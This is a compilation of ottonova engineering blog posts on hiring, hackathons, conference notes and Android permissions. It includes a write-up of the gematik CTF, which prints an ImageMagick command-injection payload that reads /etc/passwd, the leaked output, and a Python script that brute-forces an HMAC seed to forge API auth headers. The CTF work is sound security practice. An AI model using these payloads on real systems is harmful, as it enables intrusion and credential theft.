Introducing the ottonova Tech Radar

ottonova Tech RadarDaniele Franchi

We always promoted openness when it came to our tech stack. The ottonova Tech Radar is the next step in that direction.

What is the Tech Radar?

The ottonova Tech Radar is a list of technologies. It’s defined by an assessment outcome, called ring assignment and has four rings with the following definitions:

  • ADOPT – Technologies we have high confidence in to serve our purpose, also in large scale. Technologies with a usage culture in our ottonova production environment, low risk and recommended to be widely used.
  • TRIAL – Technologies that we have seen work with success in project work to solve a real problem; first serious usage experience that confirm benefits and can uncover limitations. TRIAL technologies are slightly more risky; some engineers in our organization walked this path and will share knowledge and experiences.
  • ASSESS – Technologies that are promising and have clear potential value-add for us; technologies worth to invest some research and prototyping efforts in to see if it has impact. ASSESS technologies have higher risks; they are often brand new and highly unproven in our organisation. You will find some engineers that have knowledge in the technology and promote it, you may even find teams that have started a prototyping effort.
  • HOLD – Technologies not recommended to be used for new projects. Technologies that we think are not (yet) worth to (further) invest in. HOLD technologies should not be used for new projects, but usually can be continued for existing projects.

What do we use it for?

The Tech Radar is a tool to inspire and support engineering teams at ottonova to pick the best technologies for new projects. It provides a platform to share knowledge and experience in technologies, to reflect on technology decisions and continuously evolve our technology landscape.

Based on the pioneering work of ThoughtWorks, our Tech Radar sets out the changes in technologies that are interesting in software development — changes that we think our engineering teams should pay attention to and use in their projects.

When and how is the radar updated?

In general discussions around technology and their implementation is driven everywhere across our tech departments. Once we identify that a new technology is raised, we discuss and consolidate it in our Architecture Team.

We collect these entries and once per quarter the Architecture Team rates and assigns them to the appropriate ring definition.

Disclaimer: We used Zalando’s open source code to create our Tech Radar and were heavily influenced by their implementation. Feel free to do the same to create your own version.

Recruiting Backend Engineers at ottonova

Here are some words about how the Backend Team goes about finding new team members. We want to do our part and share with the Community, as well as provide a bit more transparency into ottonova and how we are building state-of-the-art software that powers Germany’s first digital health insurance. 

This article covers what we are doing in the Backend Team, what we value, and how we ensure we hire people that share our values.

The Backend Team

Our team is responsible for many of the services that power our health insurance solutions at ottonova. This includes our own unique functionality, like document management, appointment timelines, guided signup, as well as interconnecting industry-specific specialized applications.

Under the hood, we manage a collection of independent microservices. Most of them written in PHP and delivering REST APIs through Symfony, but a couple leveraging Node.js or Go. Of course, everything we use is cutting-edge technology, and we periodically upgrade.

As a fairly young company, we spend most of our time adding new functionality to our software in cooperation with product owners. But at the same time we invest fair efforts into continuously improving the technical quality of our services.


Technical excellence  is one of our team’s core values. To this end, we are practitioners of domain driven design (DDD). Our services are built around clearly defined domains and follow strict separation boundaries. 

Because we created an architecture that allows it, and we have the internal support to focus on quality. We invest a lot into keeping the bar high and whenever needed we refactor and make sure the Domain Layer stays up to date with the business needs, or that the Infrastructure Layer is performant enough and can scale.

Although most of our work is done using PHP, we strongly believe in using the right tool for the job. Modern PHP happens to be a pretty good tool for describing a rich Domain. But we like to be pragmatic and where it is not good enough, maybe in terms of performance, we are free to choose something more appropriate.

Expectations from a new team member

From someone joining our team we first of all expect the right mindset for working in a company that values quality. We are looking for colleagues that are capable and eager to learn as well as happy to share their existing knowledge with the team.

A certain set of skills or the right foundation for developing those skills is needed as well. We are particularly interested in a good mastery of programming and PHP fundamentals, Web Development, REST, OOP, and Clean Code.

As actual coding is central to our work, we require and test the ability to both write code on the spot and to come up with clean design.

These expectations can be grouped into four main pillars that a candidate will be evaluated on:

  1. Mindset – able and willing to both acquire and transfer knowledge inside a team
  2. Knowledge – possesses the core knowledge needed for using the languages and tools we use
  3. Clean Design – capable to employ industry standards to come up with simple solutions that can be understood by others
  4. Coding Fluency – can easily transfer requirements into code and coding is a natural process
ottonova services GmbH

The Recruiting Process

To get to work with us, a candidate goes through a process designed to validate our main pillars. All this while giving them plenty of time to get to know us and have all their questions answered.

It starts with a short call with HR, followed by a simple home coding assignment. Next there is a quick technical screening call. If everything is successful, we finish it up with an in-person meeting where we take 1-2 hours to get to know each other better.

The Coding Assignment

Counting mostly for the Clean Design pillar, we start our process with a coding assignment that we send to applicants. This is meant to allow them to show how they would normally solve a problem in their day-to-day work. It can be done at home with little time pressure, as it is estimated to take a couple of hours, and it can be delivered within the next 10 days.

The solution to this would potentially fit into a few lines of code. But since the requirement is to treat it as a realistic assignment, we are expecting something a bit more elaborate. We are particularly interested in how well the design reflects the requirements and the usage of clean OOP and language features, the correctness of the result (including edge cases), and tests.

We value everyone’s time and we don’t want unnecessary effort invested into this. We definitely do not care about features that were not asked for, overly engineered user interfaces or formatting, or usage of design patterns just for the sake of showcasing their knowledge.

It will ideally be complex enough to reflect the requirements in code, but simple enough that anyone can understand the implementation without explanations.

The Tech Screening

To test the Knowledge pillar we continue with a Zoom call. This step was designed for efficiency. By timeboxing to 30 minutes we make sure everyone has time for it, even on short notice. We don’t want to lose the interest of good candidates getting lost in a scheduling maze.

Even if it’s short, this call ensures for us a considerably higher match rate for the in-person interview. In time we found that there really are just a handful of fundamental concepts that we expect a new colleague to already know. Many of the other can quickly be learned by any competent programmer.

All topics covered in this screening are objectively answerable. So at the end of a successful round we can make the invitation for the next step.

In-Person Interview

This is when we really get to know each other. This is ideally done at our office in central Munich – easier for people already close by, but equally doable for those coming from afar.

In this meeting we start by introducing ourselves to each other and sharing some information about the team and the company in general.

Next we ask about the candidate’s previous work experience. With this and the overall way our dialog progresses we want to check the Mindset pillar and ensure that the potential new colleague fits well into our team.

After that we will go into a new round of “questioning” to deeper test the Knowledge pillar. Similar to the Tech Screening, but this time open-ended. Informed opinions are expected and valued. We definitely want to talk about REST, microservices, web security, design patterns and OOP in general, or even agile processes.

Then comes the fun part. We get to write some code. Well… mostly the candidate writes it, but we can also help. We go through a few mostly straight forward coding problems that can be solved on the spot. We are not looking for obscure PHP function knowledge, bullet-proof code, or anything ready to be released. We just want to see how a new problem is tackled and make sure that writing code comes as something natural to the candidate. With this we cover the Coding Fluency pillar.

Afterwards it’s the interviewee’s turn. We take our time to answer any questions they may have. They get a chance to meet someone from another team and get a tour of the office.

What’s next?

The interviewers consult and if there is a unanimous “hire” decision, we send an offer. In any case, as soon as possible (usually a few days) we inform the candidate of the outcome.

Interested in working with us? To get started,  apply here:

CTF Writeup: Capture the TI-eRx

A few days back, the gematik – the organisation responsible for the secure network infrastructure (called telematic infrastructure or TI) of health actors – held their first CTF. The background of the CTF was the e-prescription which publicly insured people in Germany may now use to get their medicine without the need for a prescription on paper. As a private health insurance we are not yet part of this TI infrastructure, but this is something that will probably happen in the future. Therefore, as an interested party with high security standards, a team of three ottonova employees participated in the #ctfgematik.

We had a lot of fun during this day, even though there were some daily business tasks for us that prevented us from dedicating our full time and effort to the CTF. Nonetheless, we are proud about our participation (we placed 17 out of 50 registered teams, where 30 teams solved at least one challenge). We want to share our progress in the CTF here:

TI Park

One part of the CTF was held in a Workadventure Instance. The TI Park was infected by a dinosaur sickness and you had to get the medicine to become healthy again.

In challenge 1, we needed to figure out the phone number of our doctor from the input string:

74 69 5f 65 72 78 7b 2b 34 39 33 30 32 35 36 39 38 37 34 33 34 7d

Looking at the string, this is definitely some hex numbers. So let’s try to convert them to something meaningful. Converting the to ASCII characters provided the our first flag of the day: ti_erx{+4930256987434}

Challenge 2 asked us for the name of our health insurance and provided the hint:


Probably an encoding issue again. This string looked suspiciously like a base 64 encoded string and decoding it provided our second token: ti_erx{TIPK TI-Park Krankenkasse}

Now we had to figure out our e-mail address that we used with the e-prescription and got another string to work with:

01110100 01101001 01011111 01100101 01110010
01111000 01111011 01100011 01110100 01100110
01000000 01110100 01101001 01110000 01100001
01110010 01101011 00101110 01100100 01100101

Seeing that it is some binary data is easy here. Again converting it to ASCII to get some text proofed successful: ti_erx{}

Now the only thing that was left was getting the correct medicine:

64 47 6c 66 5a 58 4a 34 65 32 6b 67 61 47 46 32 5a 53 42 6b 5a 57 5a 6c 59 58 52 6c 5a 43 42 6b 61 57 35 76 63 6d 6c 30 61 58 4e 39

Again some hex data? Let’s convert to ASCII again: dGlfZXJ4e2kgaGF2ZSBkZWZlYXRlZCBkaW5vcml0aXN9

Hmm… Another base64 string? Bingo! Decode it and get the last flag for this series of challenges: ti_erx{i have defeated dinoritis}

Android App

The next set of challenges that we tackled were the challenges regarding the e-prescription mobile app. As we only had android devices at hand we were only able to solve 3 of the 4 challenges (one of them only worked with iOS).

Challenge 1 of the app challenges asked for the contact data of a non-existent health insurance. Inside the app you can get support with getting the requirements for the e-prescription such as the electronic health card and a PIN number. Therefore it provides contact details for several insurances. Finding the correct (non-existent) insurance was quite tiresome as you always had to select the insurance from a drop down menu go to the next page, check its contact information, go back choose the next insurance, and so on, and so on – For the normal usage this is fine, but for our “hacking” attempt this meant that it took us at least 20 minutes longer as it would had otherwise. Finally (after consuming two hints here), we figured out that the fea-direkt Krankenkasse is no real insurance and were able to verify its e-mail address as the correct flag: ti_erx{}

The next task asked us to figure out which doctor had prescribed a certain medicine. We quickly figured out who the doctor was in the prescription history but struggled to get the correct flag, as its name was written differently and appeared on several places in the app. Fortunately at some point our trial and error approach was fruitful and we got our next token: ti_erx{Praxis Dr. Mortuus est}

With only android devices at hand we had to skip challenge 3 and went straight to the last challenge in this category. There we needed to find a pharmacy that did not exist. The task description stated that we should look nearby. The location in the app seemed to be fixed to Cuxhaven, a city in the north of Germany. So we checked the pharmacies near our – supposed – location. The penguin pharmacy actually existed, but we were lucky nonetheless and found a pharmacy inside the app that had a suspicious e-mail address set: The name of this pharmacy proofed to be the solution: ti_erx{Shark Apotheke}

File Upload and Imagemagick

Now we are coming to the best part. Web applications with some real vulnerabilities as they appear in the wild.

We tackled the “Insider Artist”, where there was supposedly an issue with an upload form. You could upload a picture that was then resized using imagemagick. Some developer forgot the debug output of imagemagick in the website source code. After an upload you could plainly see how imagemagick was used and wich version. A short CVE research showed how vulnerable this version was and provided some exploit ideas.

The task description hinted that the requested token could be found in the name of the last created user on the linux server. So we created our exploit “file_read.mvg” and uploaded it to the server:

push graphic-context
viewbox 0 0 640 480
fill 'url(";cat "/etc/passwd)'
pop graphic-context

The response was quite meaningful and contained the following HTML comment which contained our flag:

   ---------------- START DEBUG INFORMATION ----------------
   stdout: root:x:0:0:root:/root:/bin/bash
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Version: ImageMagick 6.8.9-9 Q16 x86_64 2016-02-02
Copyright: Copyright (C) 1999-2014 ImageMagick Studio LLC
Features: DPC Modules OpenMP
Delegates: bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff wmf x xml zlib

   stderr: convert: unrecognized color `";cat "/etc/passwd' @ warning/color.c/GetColorCompliance/1046.
convert: no decode delegate for this image format `HTTPS' @ error/constitute.c/ReadImage/535.
public/upload/picture.png MVG 640x480 640x480+0+0 16-bit sRGB 121B 0.000u 0:00.459
public/upload/picture.png=>/usr/src/app/public/upload/picture.png MVG 640x480=>56x42 56x42+0+0 8-bit sRGB 2c 264B 0.020u 0:00.160
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3182.

   ----------------  END DEBUG INFORMATION  ----------------

Git History and Broken Authentication

This administrator of this vulnerable web application uploaded the .git directory onto the web server. After verifying the existence of some files in the folder (where we failed miserably to construct meaningful information manually), we simply downloaded the whole folder using the downloader from GitTools.

With the full .git folder we browsed the git history and found a secret key that was used to verify the a signature: v3ryv3rys3cr3t. We also found the hmac algorithm that was used as signature. The only unknown variable to send valid requests was a seed. This seed was a number in the range of 1 and 1000. So something that seems fairly easy to brute-force.

So we wrote a small script to generate the correct payload for an API request for any of the possible seeds, sign it and send it to the API.


import hmac
import hashlib
import base64
import requests

key = b"v3ryv3rys3cr3t"
user = "HELO"

for i in range(1, 1000):
    # print("Test for Random Number: ", i)
    # Create HMAC
    h = key, (user + str(i)).encode('utf-8'), hashlib.sha256 )
    hash = h.hexdigest()

    # Create Base64
    payload = '{{"kvnr": "{}", "sig": "{}"}}'.format(user + str(i), hash)
    b = base64.b64encode(payload.encode('utf-8'))
    # print(b)

    # Send Request
    response = requests.get("",  headers={"Accept":"application/json", "X-AUTH": b})
    if (response.text != "No prescription found"):
        print("Random Number: ", i)

The script ran for about a minute until it figured out the correct seed and gave us a valid response. Using this response, we were easily able to craft another API request regarding the medication denoted in the “Task”. This gave us the information to construct the flag. Unfortunately, we only finished this challenge 7 minutes past the deadline and were not able to enter the flag and get further points. What a shame… However this challenge was really awesome and we were debating ideas and crunching on it left us a great feeling when we finally got it working. There were so many different issues (forgotten git directory, secret in git history, signature code in git history, brute-forceable seed) in this one challenge that made it really hard but so satisfying to work on.

A big round of applause to the gematik for organising the event. We are already looking forward to the next round!


We had a lot of fun during the #ctfgematik, there were some really great challenges targeting beginners and professionals of CTFs. We did not finish the last challenge that we tried in time, but it was so satisfying to finally solve it (7 minutes after the deadline) due to all the trickery needed. We are already looking forward to the next CTF that we can participate.

Continuing our Hackathon tradition

ottonova Hackathon Remote Editionottonova services GmbH

At ottonova, we have taken the challenge of bringing a slowly moving and mostly antiquated business, the one of health insurance in Germany, into the 21st century. For over three years already we’ve been offering our customers not only competitive insurance tariffs, but also the digital products that go along with them. All this to make their lives better and to prove that, yes, insurance can also be easy and fun to use.

It follows naturally that all of us here are innovators at heart. And innovators like to try out new things. “We are brave” – as one of our company values says. In the last years, we have found that a good way to get our creative juices flowing is by holding internal hackathons. The events are organized by our IT department and welcome everyone from the company that has an idea or simply wants to help out. In the first two editions, almost all the engineers participated, joined by many more colleagues from other departments, working in teams. The enthusiasm before and after the event was overwhelming. Everyone was happy to quickly bring a cool new thing live, to try out new tech, or just to hack something up together with some colleagues with whom they would normally not work with.

After such a positive response to the previous instances, we were eagerly awaiting a new installment. What we affectionately call a Hackotton was due to have its third edition this summer. It has already been half a year since the last one. Too long, some would say. We wanted our Hackotton 3.0.

But will a Hackotton be the same if, due to Covid-19, we’re not all in the office together? We have been working remotely since spring, when the social distancing measures were started. We have been doing so successfully, but this time it was not just work, it was a bit more. We did not know how an event that is mostly social in nature would end up if organized remotely. Still, we decided to give it a try.

We planned the event to take about two days. That is enough time to try out an idea, especially when you’re able to hack it and there is no need for the rigorousness of our normal style of work. It all started with a kick-off. If in the last editions this was where ideas were pitched and teams were formed, this time round it was just a very short zoom call to give the start. The idea gathering and team forming was replaced with a Confluence page with a join option for team members. As this was announced well in advance. There was plenty of time to think about topics and decide which teams to join. We ended up having a total of 10 teams and, for the first time, we were joined by external guests.

When the Hackottons where held in the office, all the planning and communication was done in person. There was a constant rustle on the floor, caused by people changing desks to be close to their team, or heated discussion between team members. This time, while the office was still available for the few that chose to go there, most people worked remotely. So the close collaboration mode needed to be emulated somehow. Though some quick planning was done in the beginning to distribute tasks, in the end, we relied mostly on instant messaging (Mattermost) and video calling (Zoom) to get things done.

As we have the good habit of developing only containerized applications, and have quite some practice with this, even “hacked” solutions built during the Hackotton are put into Docker containers. This allows for way easier collaboration and building more complex systems also in hackathon mode. Especially now when working remotely, it feels so good for a team mate to give you an already built container, and you can simply connect it to the part that you are implementing. As a follow up advantage of this setup, we can quickly add these containers to AWS’s ECS in our pre-live environment, so that we demo our ideas under realistic conditions, and later, with the infrastructure already solved, have a smooth path towards a live release.

At the end of an intense second day of hacking, and after hurrying to bring our projects to a functional state and crop up some sort of presentation, we had the chance to show our ideas to the whole company (over Zoom) and see what the other teams managed to build. Everyone was given a 5 minute slot to demo and present their project and impress the audience. A hard task to contain all the passion the teams poured into their projects into 5 short minutes, but the moderators were understanding and allowed for more time when the mark was overstepped.

After all the teams got their turn in the spotlight and demoed their ideas, we had an online voting round to choose a winner. The laurel wreath for the 3rd Hackotton edition went, by a margin, to a very fruitful collaboration between the android developers and one of our designers. They came up with a radically different approach for structuring our mobile apps. They showed how by putting the focus on the doctor appointments, interactions with our apps can be greatly simplified. Their solution takes our current separate Timeline, Documents and Chat sections in the apps, and brings them together under Appointments. This way related invoices, claim settlements, doctor appointments can be reviewed under one place, as well as making it easier to communicate with our customer support. This will allow our app users to have a better overview and control over their interactions with healthcare providers and with us as an insurance company, and consequently them being happier with our service.

Apart from the great mobile app improvement idea, all the other teams brought convincing proposals. In this edition we got to see new tooling for our colleagues in the Sales department, improvements in document processing using OCR, optimizations to our website, internal applications for making our work easier, and even more changes for the better for our customers’ experience using our products. The response from the audience was overwhelmingly positive, and even if the event ended with the presentations and voting, discussions about the projects continued well into the next days.

As any hackathon comes with improvement in morale and team spirit, we can already conclude that organizing them is a long term win for the participants and the company overall. For us at ottonova, it happened that the past Hackottons came with some short term wins as well. Some of the projects ended up being used – either directly, or after planning them into our Roadmap. From the past events we have “Agento”, a very handy internal automation tool that we use to quickly insure children attached to a parent’s account, as well as “ottoPrint” our own PDF generation service, which is much faster and more customizable than the off-the-shelf solution we’ve been using until then. So we are fairly confident that some of this edition’s projects will end up being used. The winner already sparked the interest of the product owners.

With this third edition, and organizing it even remotely, the Hackotton has become part of our company culture and has proven that it can endure. As we are coming to know that “after the Hackotton is before the Hackotton”, we’re now anxiously waiting for the fourth one, and using the time to come up with cool new ideas.

I and the rest of the PHP engineers at ottonova, had the pleasure of attending the PHP.Barcelona Conference in November this year. It was a great experience, spanning over two full days.

I’ve put together some quick and biased notes about the presentations. Here it goes…

Owned by the author

Day 1

Opening Keynote – Rasmus Lerdorf

Really uplifting beginning of the conference with Rasmus going down memory lane. We got to know some of the motivation and the process of creating PHP. All this further strengthening my opinion that it didn’t really start as serious programming language. (Ok. I admit. It did progress since then, so don’t start throwing stones.)

A funny highlight was the explanation that “PHP is vertically consistent” – the PHP functions match the vendor functions they create an API for. Of course, this leaves it inconsistent with itself.

Also, really enlightening, was clarifying why adding things like further type checking, generics, or class modifiers, like “immutable” would be a serious performance hit to the language – so we should really stop hoping that any of that would come soon. 

From Helpers to Middleware – Marco Pivetta

Nice practical presentation. It showed how design can incrementally evolve, from what would basically be spaghetti code, into a proper modular and scalable middleware-style architecture. While a good start, I would have hoped to see a deeper dive into this style, because where it stopped it felt like it just scratched the surface.

Microservices gone wrong – Anthony Ferrara

Although this was just a public retrospective of a specific project, which maybe will not resonate with everyone, for me and the work we do at ottonova, there were still a couple of valuable lessons to take home:

  • Messages that microservices use to synchronize can be differentiated into proper Events and RPCs, and these categories can and maybe should be treated differently. The latter require a response back, while the former don’t really need it. We don’t have this clear separation ourselves yet, but the need for it is definitely starting to show.
  • Each entity in your domain does not need to have its own service. Larger services are also fine, if they make sense for your use case. Our own setup is using domain-defined microservices, of various sizes, so seeing that splitting everything aggressively may backfire will make us think twice when extracting a new microservice.

He has a cute dog.

Serverless PHP applications with Bref – Matthieu Napoli

I guess it’s nice to see that there is a way to hook up PHP to Lambda, but then again, why take the effort to force it and not just use a language supported directly? Apart from that aspect, interesting to see an intro into AWS Lambda, since I didn’t try it out myself yet.

JSON Web Tokens – Sam Bellen

Not that much to say here: JWTs. We already use them, you should use them too. They’re easy to work with and really useful. At their core they are just signed information in a nice and standard JSON format. Nevertheless still a very powerful concept as it enables you to transfer claims securely from one party to another.

Developing cacheable PHP applications – Thijs Feryn

Well, this one was awkward. Especially since I had the pleasure of sitting through this exact presentations some months before. Thijs is a dedicated evangelist, you have to give it to him. He manages to squeeze everything out of what Varnish can do and serve it to his audience on a silver platter. 

Now come the buts. The use-cases considered in the presentation are outdated. Really focusing too much on server side rendering and templating. And I particularly did not enjoy instructing an auditorium full of developers (maybe some more impressionable than other) to use their caching layer for keeping application logic.

Nothing wrong with Varnish itself, though. And since we need to keep all our data inside Germany, for legal reasons, maybe we’ll need to consider ourselves an on-premise caching solution in the future.

PHP Performance Trivia – Nikita Popov

Really confident presentation from one of the core PHP contributors, containing a deeper dive into how the OPcache works, and what its limitations are. Not that serious limitations, if you ask me. With a bit of care for how you handle deployments, you should be fine.

Also interesting to see some benchmarks that show that using objects instead of arrays is much more memory-efficient in PHP. Not that the opposite would have made us drop using Value Objects, but still good to see that we’re already using the memory friendly option.

Get GOing with a new language – Kat Zień

While there was nothing spectacular about this presentation, just an intro into Go, I still enjoyed seeing that there is a clear interest from the PHP community to explore other languages. Go is particularly relevant for us at ottonova, since we’re already using it for our messaging setup and we plan to try some more areas where we think it would do a better job than good old PHP.

Day 2

Advanced Web Application Architecture – Matthias Noback

Nice structured first dive into DDD and the rationale of it. We’re already doing most of what this presentation talks about, and much more, at ottonova, but it helps to see another’s take on it and double-check our approach.

It was reassuring to see that one of the first requirements of DDD is to separate your Domain from your Infrastructure, a thing that we carefully follow, along with some more advanced techniques.

Also really appreciated the general advice that not every project is the same and if something applies somewhere it does not automatically mean that it will apply to your situation. This is, of course, common sense, but it doesn’t hurt to hear some basic common sense from time to time, in a world overflooded with strong opinions.

Working with Webhooks – Lorna Mitchell

Decent structured presentation about Webhooks – an architectural style for async communication. Nothing groundbreaking here, but since this style is not standardly used (or at least not by me), it’s nice to be reminded it exists. Good tip with using ngrok for exposing local stuff.

Supercharge your apps with ReactPHP & PHP-PM – Albert Casademont

Since FPM is already showing its scaling limitations for us, it was particularly interesting to see what other options would be available.

For many of our processed requests, we have the common pattern that we get some input, we process it, and then pass it to another service (maybe external) and wait for a response. Then we do some more work on it and respond to our client. This implies considerable processing power wasted on our side – we wait a lot for HTTP responses ourselves. This is where some concurrent PHP would come in handy. While one request is waiting, other requests can be handled. So we will definitely be looking into either PHP-PM, or Swoole in the future.

It’s all about the goto – Derick Rethans

This was a nice, theoretical, dive into how PHP parses and executes code. For someone with a minimal Computer Science background, I think it was still fairly basic, and I don’t think there was much to take away.

Develop microservices in PHP – Enrico Zimuel

This was an interesting walk-through what are some of the benefits, and specific concerns, of using microservices. Nothing too new to us, since we already heavily rely on microservices both in the PHP group and in our other teams.

One thing we noted down to improve was the standardisation of error responses. Good hint. We’ll definitely look into that one.

Mutation Testing – Better code by making bugs – Théo Fidry

Mutation Testing seems really cool as a theoretical concept, and it’s nice to see that someone is trying it out. Not sure how it would work out in practice. So far, I can see two major downsides. First, it simply takes a lot of time to run such a test. Even with optimisations, this will be something that could take hours. Second, the testing itself seems only as good as your mutators, and I think writing relevant mutators is not a trivial task. Having some that just replace operators could be straight-forward, but how much does that help?

Back to Munich

And the rest we sadly had to skip, to not miss our plane back home.

Overall, as we hoped when booking the tickets, the lineup was a solid one. And they delivered. Kudos to them, as well as to the organizers. We came back with lots of new ideas, some that we will try in the near future, and confirmation that we are on the right track with many of our architectural decisions.

We will definitely have Barcelona on our list for next year as well. Lovely city too.

Our Android App’s Permissions Explained


ottonova services GmbH

Starting with Android 6 (Marshmallow), Android has been improving and shaping permissions, adding more control to users and a better overview of what apps do with those permissions. App permissions are going in a direction of more transparency and security.

Still, it’s not always easy to understand why some permissions are needed some times. We at ottonova would like to clarify why we request some permissions and for what do we use them.

Permissions overview

The purpose of a permission is to protect the privacy of an Android user. Android apps must request permission to access sensitive user data (such as contacts and SMS), as well as certain system features (such as camera and internet). Depending on the feature, the system might grant the permission automatically or might prompt the user to approve the request.

Permissions are used to request system functionalities. Some permissions require user approval and some don’t. It depends on the protection level of the permission.
There are 4 levels of permissions: Normal, SignatureDangerous and special.
Additionally there are custom permissions that can be created to request app services access. Basically an app can declare these custom permissions so it can access another app or its own service.

Protection levels

LevelNeeds user approval?DescriptionExample
NormalNoProvides access to data or resources outside the app sandbox. Does not incur any risk to private data or other apps operations.WiFi state, Internet, Bluetooth, etc
SignatureNoThese permissions are granted at install time. Apps that require these permissions need to be signed by the same certificate of the app that defines the permission.Battery stats, carrier services, etc
DangerousYesThese permissions can provide access to sensitive data or resources or could potentially affect the user’s stored data or operations by other apps. The user must explicitly authorize the usage of these permissions. The app can only use a functionality that depends on these permissions after the user authorizes it.Read contacts, camera, capture audio, etc
Special / PrivilegedYesSimilar to dangerous permissions, but the authorization of these permissions is managed by Android Operating system. Apps should try to avoid using these permissionsWrite settings, system alert windows, etc

What permissions do we use?

ottonova services GmbH


Permission name: android.permission.CAMERA
Protection level: dangerous

One of the core features of the ottonova app, is that you can quickly scan an invoice or other document and quickly upload it to us. We could use the native camera and not request this permission, but then users would lose the features that we provide by using our in-app camera feature, that gives users automatic boundary/edge detection of documents and editing functions like cropping, rotating, etc.

Permission name: android.permission.FLASHLIGHT
Protection level: Normal

Used to turn the phone’s flashlight on or off for when users scan a document.


Permissions name: android.permission.READ_EXTERNAL_STORAGE, android.permission.WRITE_EXTERNAL_STORAGE
Protection level: dangerous

Besides scanning a document on the spot, users may also want to upload a document from their phone storage. This includes images or PDFs. That’s why we require this permission, so we can read an imported file from the external storage. This permission is not strictly necessary for users to upload invoices, it’s only necessary if you would like to import a file. We don’t scan the external storage, the implementation of this feature calls the default file picker on the phone, and most file picker apps that come with Android don’t actually require the caller app (ottonova in this case) to request this external storage permission, but unfortunately some do. That’s why we request this permission, so your experience as a user is as smooth as possible. Android 10 is introducing some changes to these permissions, an app won’t have to request access to all external storage anymore and will be able to only request access to media folders in the external storage.

Other app capabilities

Permissions name: android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.INTERNET
Protection level: Normal

All of these permissions are related to the internet access. The INTERNET one is so we can perform operations that require internet and the other are just so we can know if we’re connected to a network or if we have internet at all.

Permission name: android.permission.WAKE_LOCK
Protection level: Normal

This permission allows an app to keep the phone awake for a certain amount of time. In ottonova’s app case, this is used by our tracking library (Firebase by Google) to keep the phone awake while Firebase communicates with google service to provide helpful app usage data to the server. Users can disable at any time app usage tracking, simply go to App settings > Notifications. If you disable tracking this permission won’t be used at all.

Permission name: android.permission.USE_FINGERPRINT
Protection level: Normal

With ottonova’s app, we have a pin screen to keep your data safe. You can either input a defined pin or use your fingerprint to unlock the app.

Permissions name:,
Protection level: Normal (Custom permission)

Both of these permissions are defined by Google. The RECEIVE is used to receive push notifications and the BIND_GET_INSTALL_REFERRER_SERVICE is used by Firebase to recognize where the app was installed from.

Permission name: android.permission.FOREGROUND_SERVICE
Protection level: Normal

When a document is being uploaded we use this permission so users can put the app to background while we finish the upload operation. Whenever this permission is used a notification is always shown.


Permissions are getting more transparent and users are getting more control over what apps can do. These are vital improvements to help keeping user data safe.
Still, we feel that there are some improvements to be made in this field. For instance, external storage is still not a very safe place to store sensitive data because other apps can access that data without system privileges just by requesting the external storage permission (it’s starting to change with Android 10), that’s one of the reasons we don’t store any sensitive user related data locally, all sensitive data is stored remotely in our servers. At ottonova we use only the bare minimum permissions that we can to make our app and services work, always keeping in mind potential vulnerabilities that could compromise our customers data.

We value transparency, that’s why we made this post.

We welcome changes made to improve app permissions and overall security regarding users data privacy. For example, Android 10 is introducing new permission scopes for external storage access, meaning that apps will be able to simply request access to media folders (i.e.: Images or Download folder). Also, although not used by ottonova, asking for location while on background will require user permission. There are more changes, to see further privacy changes on Android 10 see this link.


The QA Engineer position at ottonova

ottonova services GmbH
Some information about our QA Chapter and the QA Automation Engineer position at ottonova

We would like to use this article to give some insights on the QA Engineer position here at ottonova and to answer

This article gives some insights on the QA Engineer position here at ottonova. Since the position can be interpreted quite differently we want to answer some common questions. Here we go.

1. Is test automation part of the QA activity? If yes, what experience in which programming languages and frameworks is required here?

Yes, test automation is a very important part for us. For the automation of the web tests, we use Python and JavaScript.
The UI tests from the iOS and Android apps are implemented in Appium. Experience in using classic frameworks like Page Object Pattern and common build tools like Jenkins or GitLab CI is also a big plus.

2. Exactly what kind of tests are performed and developed (acceptance testing, regression testing, UI testing, backend API testing…)?

Regression and acceptance tests are developed and executed. The development and execution of the automated UI and backend tests is also part of our daily activities.

3. Which application are tested? The ottonova app? If so, are both versions (iOS and Android) tested?

In our QA team we test our various web applications as well as our mobile apps (iOS and Android).

4. How big is the development team and how many members does the test team consist of? How many releases would be tested per day? 

There are several engineering teams consisting of backend, frontend, mobile and QA engineers. The teams use Scrum and are organized cross-functionally. They therefore also include, for example, product owners or members of our insurance departments.

Each of our cross-functional teams has at least one dedicated QA Engineer.

6. What are the weekly working hours at ottonova? What further development opportunities do I have in your company in the area of QA?

We are flexible on all points and are happy to accommodate the wishes and ideas of applicants, both in terms of weekly hours and contract terms.

Working student contracts are limited to one year by default and have a fixed hourly wage. A permanent position after a student job (or internship) is always our highest goal.

In our employment contracts for a full-time position, there is always a probationary period of 6 months.

The development opportunities are individual depending on the employee, we support the realization of your goals where we can.

Welcome to our blog!

Hello everybody,

with this post we want to kick off the blog and also explain what it’s for.

With this blog we sincerely want to give you insights on how we create the software and platform behind ottonova. The first newly founded private health insurance in a long time.

We are assembling a strong and experienced IT team and are still growing. With a focus on everything it needs to create and run a fully digital health insurance: Multi platform software engineering, cloud infrastructure, quality assurance, data science, data security, and office IT.

Our idea is to regularly publish interesting articles about our work and how we organise.

Hopefully our content is an inspiration in one or the other way to someone.

All the best and see you soon,
Jan 🚀